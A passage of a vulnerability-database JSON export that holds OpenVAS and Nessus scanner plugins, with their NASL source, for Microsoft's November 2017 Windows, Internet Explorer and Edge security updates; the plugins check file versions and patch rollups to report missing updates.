value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-11-15 13:39:48 +0530 (Wed, 15 Nov 2017)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4048957)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4048957\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists as,\n\n - This security update includes improvements and resolves the following issues:\n Addressed issue where applications based on the 
Microsoft JET Database Engine\n (Microsoft Access 2007 and older or non-Microsoft applications) fail when\n creating or opening Microsoft Excel .xls files.\n\n - Security updates to Microsoft Windows Search Component, Microsoft Graphics\n Component, Windows kernel-mode drivers, Windows Media Player, and Windows kernel.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to read data that was not intended to be disclosed, and obtain information to\n further compromise the user's system.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows Server 2008 R2 for x64-based Systems Service Pack 1\n\n - Microsoft Windows 7 for 32-bit/x64 Systems Service Pack 1\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4048957\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win2008r2:2, win7:2, win7x64:2) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nfileVer = fetch_file_version(sysPath:sysPath, file_name:\"advapi32.dll\");\nif(!fileVer){\n exit(0);\n}\n\nif(version_is_less(version:fileVer, test_version:\"6.1.7601.23915\"))\n{\n report = report_fixed_ver(file_checked:sysPath + \"\\advapi32.dll\",\n file_version:fileVer, vulnerable_range:\"Less than 6.1.7601.23915\");\n security_message(data:report);\n 
exit(0);\n}\nexit(0);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:35:34", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-11834", "CVE-2017-11848", "CVE-2017-11791", "CVE-2017-11869", "CVE-2017-11858", "CVE-2017-11855", "CVE-2017-11843", "CVE-2017-11846"], "description": "This host is missing a critical security\n update according to Microsoft security updates KB4047206.", "modified": "2020-06-04T00:00:00", "published": "2017-11-15T00:00:00", "id": "OPENVAS:1361412562310812208", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310812208", "type": "openvas", "title": "Microsoft Internet Explorer Multiple Vulnerabilities (KB4047206)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Internet Explorer Multiple Vulnerabilities (KB4047206)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:microsoft:ie\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.812208\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-11791\", \"CVE-2017-11834\", \"CVE-2017-11843\", \"CVE-2017-11846\",\n \"CVE-2017-11848\", \"CVE-2017-11855\", \"CVE-2017-11858\", \"CVE-2017-11869\");\n script_tag(name:\"cvss_base\", value:\"7.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-11-15 10:47:54 +0530 (Wed, 15 Nov 2017)\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_name(\"Microsoft Internet Explorer Multiple Vulnerabilities (KB4047206)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft security updates KB4047206.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - Scripting engine does not properly handle objects in memory.\n\n - Internet Explorer improperly handles page content.\n\n - Internet Explorer improperly accesses objects in memory.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attacker\n to obtain information to further compromise the user's system, execute arbitrary\n code in the context of the current user, detect the navigation of the user\n leaving a maliciously crafted page.\");\n\n script_tag(name:\"affected\", 
value:\"Microsoft Internet Explorer version 9.x.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4047206\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"gb_ms_ie_detect.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"MS/IE/Version\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win2008:3, win2008x64:3) <= 0){\n exit(0);\n}\n\nieVer = get_app_version(cpe:CPE);\nif(!ieVer || ieVer !~ \"^9\\.\"){\n exit(0);\n}\n\niePath = smb_get_system32root();\nif(!iePath ){\n exit(0);\n}\n\niedllVer = fetch_file_version(sysPath:iePath, file_name:\"Mshtml.dll\");\nif(!iedllVer){\n exit(0);\n}\n\nif(hotfix_check_sp(win2008:3, win2008x64:3) > 0)\n{\n if(version_is_less(version:iedllVer, test_version:\"9.0.8112.21073\"))\n {\n report = report_fixed_ver( file_checked:iePath + \"\\Mshtml.dll\",\n file_version:iedllVer, vulnerable_range:\"Less than 9.0.8112.21073\" );\n security_message(data:report);\n exit(0);\n }\n}\nexit(0);\n", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2020-08-19T05:12:46", "description": "The remote Windows host is missing security update 4048952.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browsers access objects in memory. The\n vulnerability could corrupt memory in a way that could\n allow an attacker to execute arbitrary code in the\n context of the current user. 
An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11827,\n CVE-2017-11858)\n\n - A remote code execution vulnerability exists in the way\n the scripting engine handles objects in memory in\n Microsoft browsers. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2017-11837, CVE-2017-11838, CVE-2017-11843,\n CVE-2017-11846)\n\n - A security feature bypass exists when Device Guard\n incorrectly validates an untrusted file. An attacker who\n successfully exploited this vulnerability could make an\n unsigned file appear to be signed. Because Device Guard\n relies on the signature to determine the file is non-\n malicious, Device Guard could then allow a malicious\n file to execute. In an attack scenario, an attacker\n could make an untrusted file appear to be a trusted\n file. The update addresses the vulnerability by\n correcting how Device Guard handles untrusted files.\n (CVE-2017-11830)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11855,\n CVE-2017-11856, CVE-2017-11869)\n\n - An information vulnerability exists when Windows Media\n Player improperly discloses file information. Successful\n exploitation of the vulnerability could allow the\n attacker to test for the presence of files on disk.\n (CVE-2017-11768)\n\n - An information disclosure vulnerability exists when the\n scripting engine does not properly handle objects in\n memory in Internet Explorer. 
An attacker who\n successfully exploited the vulnerability could obtain\n information to further compromise the users system.\n (CVE-2017-11834)\n\n - A security feature bypass vulnerability exists in\n Microsoft Edge when the Edge Content Security Policy\n (CSP) fails to properly validate certain specially\n crafted documents. An attacker who exploited the bypass\n could trick a user into loading a page containing\n malicious content. (CVE-2017-11863)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Microsoft Edge. The vulnerability could corrupt memory\n in such a way that an attacker could execute arbitrary\n code in the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11836,\n CVE-2017-11839, CVE-2017-11840, CVE-2017-11841,\n CVE-2017-11866, CVE-2017-11873)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly initializes objects in memory.\n (CVE-2017-11880)\n\n - A Win32k information disclosure vulnerability exists\n when the Windows GDI component improperly discloses\n kernel memory addresses. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2017-11851)\n\n - An information disclosure vulnerability exists when the\n scripting engine does not properly handle objects in\n memory in Microsoft browsers. An attacker who\n successfully exploited the vulnerability could obtain\n information to further compromise the users system.\n (CVE-2017-11791)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. 
An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2017-11847)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles page content, which\n could allow an attacker to detect the navigation of the\n user leaving a maliciously crafted page.\n (CVE-2017-11848)\n\n - An information disclosure vulnerability exists when the\n Windows kernel fails to properly initialize a memory\n address. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2017-11831,\n CVE-2017-11842, CVE-2017-11849, CVE-2017-11853)\n\n - A denial of service vulnerability exists when Windows\n Search improperly handles objects in memory. An attacker\n who successfully exploited the vulnerability could cause\n a remote denial of service against a system.\n (CVE-2017-11788)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2017-11850)\n\n - An information disclosure vulnerability exists in the\n way that Microsoft Edge handles cross-origin requests.\n An attacker who successfully exploited this\n vulnerability could determine the origin of all webpages\n in the affected browser. 
(CVE-2017-11833)", "edition": 30, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2017-11-14T00:00:00", "title": "KB4048952: Windows 10 Version 1511 November 2017 Cumulative Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-11839", "CVE-2017-11880", "CVE-2017-11851", "CVE-2017-11856", "CVE-2017-11834", "CVE-2017-11848", "CVE-2017-11842", "CVE-2017-11836", "CVE-2017-11840", "CVE-2017-11831", "CVE-2017-11830", "CVE-2017-11873", "CVE-2017-11791", "CVE-2017-11788", "CVE-2017-11837", "CVE-2017-11841", "CVE-2017-11838", "CVE-2017-11827", "CVE-2017-11869", "CVE-2017-11863", "CVE-2017-11833", "CVE-2017-11858", "CVE-2017-11855", "CVE-2017-11849", "CVE-2017-11843", "CVE-2017-11847", "CVE-2017-11853", "CVE-2017-11846", "CVE-2017-11850", "CVE-2017-11768", "CVE-2017-11866"], "modified": "2017-11-14T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS17_NOV_4048952.NASL", "href": "https://www.tenable.com/plugins/nessus/104548", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(104548);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/08/18\");\n\n script_cve_id(\n \"CVE-2017-11768\",\n \"CVE-2017-11788\",\n \"CVE-2017-11791\",\n \"CVE-2017-11827\",\n \"CVE-2017-11830\",\n \"CVE-2017-11831\",\n \"CVE-2017-11833\",\n \"CVE-2017-11834\",\n \"CVE-2017-11836\",\n \"CVE-2017-11837\",\n \"CVE-2017-11838\",\n \"CVE-2017-11839\",\n \"CVE-2017-11840\",\n \"CVE-2017-11841\",\n \"CVE-2017-11842\",\n \"CVE-2017-11843\",\n \"CVE-2017-11846\",\n \"CVE-2017-11847\",\n \"CVE-2017-11848\",\n \"CVE-2017-11849\",\n \"CVE-2017-11850\",\n \"CVE-2017-11851\",\n \"CVE-2017-11853\",\n \"CVE-2017-11855\",\n \"CVE-2017-11856\",\n \"CVE-2017-11858\",\n \"CVE-2017-11863\",\n \"CVE-2017-11866\",\n \"CVE-2017-11869\",\n \"CVE-2017-11873\",\n \"CVE-2017-11880\"\n );\n script_bugtraq_id(\n 101703,\n 101705,\n 101706,\n 101709,\n 101711,\n 101714,\n 101715,\n 101716,\n 101719,\n 101721,\n 101722,\n 101725,\n 101727,\n 101728,\n 101729,\n 101732,\n 101733,\n 101734,\n 101735,\n 101737,\n 101738,\n 101740,\n 101741,\n 101742,\n 101748,\n 101751,\n 101753,\n 101755,\n 101762,\n 101763,\n 101764\n );\n script_xref(name:\"MSKB\", value:\"4048952\");\n script_xref(name:\"MSFT\", value:\"MS17-4048952\");\n\n script_name(english:\"KB4048952: Windows 10 Version 1511 November 2017 Cumulative Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4048952.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browsers access objects in memory. 
The\n vulnerability could corrupt memory in a way that could\n allow an attacker to execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11827,\n CVE-2017-11858)\n\n - A remote code execution vulnerability exists in the way\n the scripting engine handles objects in memory in\n Microsoft browsers. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2017-11837, CVE-2017-11838, CVE-2017-11843,\n CVE-2017-11846)\n\n - A security feature bypass exists when Device Guard\n incorrectly validates an untrusted file. An attacker who\n successfully exploited this vulnerability could make an\n unsigned file appear to be signed. Because Device Guard\n relies on the signature to determine the file is non-\n malicious, Device Guard could then allow a malicious\n file to execute. In an attack scenario, an attacker\n could make an untrusted file appear to be a trusted\n file. The update addresses the vulnerability by\n correcting how Device Guard handles untrusted files.\n (CVE-2017-11830)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11855,\n CVE-2017-11856, CVE-2017-11869)\n\n - An information vulnerability exists when Windows Media\n Player improperly discloses file information. 
Successful\n exploitation of the vulnerability could allow the\n attacker to test for the presence of files on disk.\n (CVE-2017-11768)\n\n - An information disclosure vulnerability exists when the\n scripting engine does not properly handle objects in\n memory in Internet Explorer. An attacker who\n successfully exploited the vulnerability could obtain\n information to further compromise the users system.\n (CVE-2017-11834)\n\n - A security feature bypass vulnerability exists in\n Microsoft Edge when the Edge Content Security Policy\n (CSP) fails to properly validate certain specially\n crafted documents. An attacker who exploited the bypass\n could trick a user into loading a page containing\n malicious content. (CVE-2017-11863)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Microsoft Edge. The vulnerability could corrupt memory\n in such a way that an attacker could execute arbitrary\n code in the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11836,\n CVE-2017-11839, CVE-2017-11840, CVE-2017-11841,\n CVE-2017-11866, CVE-2017-11873)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly initializes objects in memory.\n (CVE-2017-11880)\n\n - A Win32k information disclosure vulnerability exists\n when the Windows GDI component improperly discloses\n kernel memory addresses. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2017-11851)\n\n - An information disclosure vulnerability exists when the\n scripting engine does not properly handle objects in\n memory in Microsoft browsers. 
An attacker who\n successfully exploited the vulnerability could obtain\n information to further compromise the users system.\n (CVE-2017-11791)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2017-11847)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles page content, which\n could allow an attacker to detect the navigation of the\n user leaving a maliciously crafted page.\n (CVE-2017-11848)\n\n - An information disclosure vulnerability exists when the\n Windows kernel fails to properly initialize a memory\n address. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2017-11831,\n CVE-2017-11842, CVE-2017-11849, CVE-2017-11853)\n\n - A denial of service vulnerability exists when Windows\n Search improperly handles objects in memory. An attacker\n who successfully exploited the vulnerability could cause\n a remote denial of service against a system.\n (CVE-2017-11788)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2017-11850)\n\n - An information disclosure vulnerability exists in the\n way that Microsoft Edge handles cross-origin requests.\n An attacker who successfully exploited this\n vulnerability could determine the origin of all webpages\n in the affected browser. 
(CVE-2017-11833)\");\n # https://support.microsoft.com/en-us/help/4048952/windows-10-update-kb4048952\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?306ca15c\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply security update KB4048952.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-11847\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/11/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/11/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/11/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS17-11\";\nkbs = make_list('4048952');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\nproduct = get_kb_item_or_exit(\"SMB/ProductName\");\nif(product !~ \"Windows 10 (Education|Enterprise)\")\n audit(AUDIT_HOST_NOT, \"Windows 10 Education or Enterprise.\");\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"10586\",\n rollup_date:\"11_2017\",\n bulletin:bulletin,\n rollup_kb_list:[4048952])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-14T18:30:57", "description": "The remote Windows host is missing security update 4048954.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A security feature bypass vulnerability exists when\n Microsoft Edge improperly handles redirect requests.
The\n vulnerability allows Microsoft Edge to bypass Cross-\n Origin Resource Sharing (CORS) redirect restrictions,\n and to follow redirect requests that should otherwise be\n ignored. An attacker who successfully exploited the\n vulnerability could force the browser to send data that\n would otherwise be restricted to a destination website\n of the attacker's choice. (CVE-2017-11872)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Microsoft Edge. The vulnerability could corrupt memory\n in such a way that an attacker could execute arbitrary\n code in the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11836,\n CVE-2017-11839, CVE-2017-11840, CVE-2017-11841,\n CVE-2017-11861, CVE-2017-11866, CVE-2017-11870,\n CVE-2017-11871, CVE-2017-11873)\n\n - A remote code execution vulnerability exists in the way\n the scripting engine handles objects in memory in\n Microsoft browsers. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2017-11837, CVE-2017-11838, CVE-2017-11843,\n CVE-2017-11846)\n\n - An information disclosure vulnerability exists when\n Microsoft Edge improperly handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-11803, CVE-2017-11844)\n\n - An information disclosure vulnerability exists when the\n scripting engine does not properly handle objects in\n memory in Internet Explorer. 
An attacker who\n successfully exploited the vulnerability could obtain\n information to further compromise the users system.\n (CVE-2017-11834)\n\n - A security feature bypass vulnerability exists in\n Microsoft Edge as a result of how memory is accessed in\n code compiled by the Edge Just-In-Time (JIT) compiler\n that allows Control Flow Guard (CFG) to be bypassed. By\n itself, this CFG bypass vulnerability does not allow\n arbitrary code execution. However, an attacker could use\n the CFG bypass vulnerability in conjunction with another\n vulnerability, such as a remote code execution\n vulnerability, to run arbitrary code on a target system.\n (CVE-2017-11874)\n\n - An information vulnerability exists when Windows Media\n Player improperly discloses file information. Successful\n exploitation of the vulnerability could allow the\n attacker to test for the presence of files on disk.\n (CVE-2017-11768)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browsers access objects in memory. The\n vulnerability could corrupt memory in a way that could\n allow an attacker to execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11827,\n CVE-2017-11858)\n\n - A security feature bypass vulnerability exists in\n Microsoft Edge when the Edge Content Security Policy\n (CSP) fails to properly validate certain specially\n crafted documents. An attacker who exploited the bypass\n could trick a user into loading a page containing\n malicious content. (CVE-2017-11863)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. 
An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11855,\n CVE-2017-11856, CVE-2017-11869)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly initializes objects in memory.\n (CVE-2017-11880)\n\n - A Win32k information disclosure vulnerability exists\n when the Windows GDI component improperly discloses\n kernel memory addresses. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2017-11851)\n\n - An information disclosure vulnerability exists when the\n scripting engine does not properly handle objects in\n memory in Microsoft browsers. An attacker who\n successfully exploited the vulnerability could obtain\n information to further compromise the users system.\n (CVE-2017-11791)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2017-11847)\n\n - A security feature bypass exists when Device Guard\n incorrectly validates an untrusted file. An attacker who\n successfully exploited this vulnerability could make an\n unsigned file appear to be signed. Because Device Guard\n relies on the signature to determine the file is non-\n malicious, Device Guard could then allow a malicious\n file to execute. In an attack scenario, an attacker\n could make an untrusted file appear to be a trusted\n file. 
The update addresses the vulnerability by\n correcting how Device Guard handles untrusted files.\n (CVE-2017-11830)\n\n - A remote code execution vulnerability exists when\n Microsoft Edge improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that enables an attacker to execute arbitrary code in\n the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11845)\n\n - An information disclosure vulnerability exists when the\n Windows kernel fails to properly initialize a memory\n address. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2017-11831,\n CVE-2017-11842, CVE-2017-11849, CVE-2017-11853)\n\n - A denial of service vulnerability exists when Windows\n Search improperly handles objects in memory. An attacker\n who successfully exploited the vulnerability could cause\n a remote denial of service against a system.\n (CVE-2017-11788)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2017-11850)\n\n - An information disclosure vulnerability exists in the\n way that Microsoft Edge handles cross-origin requests.\n An attacker who successfully exploited this\n vulnerability could determine the origin of all webpages\n in the affected browser. 
(CVE-2017-11833)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles page content, which\n could allow an attacker to detect the navigation of the\n user leaving a maliciously crafted page.\n (CVE-2017-11848)", "edition": 31, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2017-11-14T00:00:00", "title": "KB4048954: Windows 10 Version 1703 November 2017 Cumulative Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-11839", "CVE-2017-11880", "CVE-2017-11851", "CVE-2017-11871", "CVE-2017-11856", "CVE-2017-11844", "CVE-2017-11834", "CVE-2017-11848", "CVE-2017-11842", "CVE-2017-11836", "CVE-2017-11870", "CVE-2017-11840", "CVE-2017-11831", "CVE-2017-11830", "CVE-2017-11873", "CVE-2017-11872", "CVE-2017-11791", "CVE-2017-11788", "CVE-2017-11837", "CVE-2017-11841", "CVE-2017-11838", "CVE-2017-11827", "CVE-2017-11845", "CVE-2017-11803", "CVE-2017-11869", "CVE-2017-11861", "CVE-2017-11863", "CVE-2017-11833", "CVE-2017-11858", "CVE-2017-11855", "CVE-2017-11849", "CVE-2017-11843", "CVE-2017-11847", "CVE-2017-11874", "CVE-2017-11853", "CVE-2017-11846", "CVE-2017-11850", "CVE-2017-11768", "CVE-2017-11866"], "modified": "2017-11-14T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS17_NOV_4048954.NASL", "href": "https://www.tenable.com/plugins/nessus/104550", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
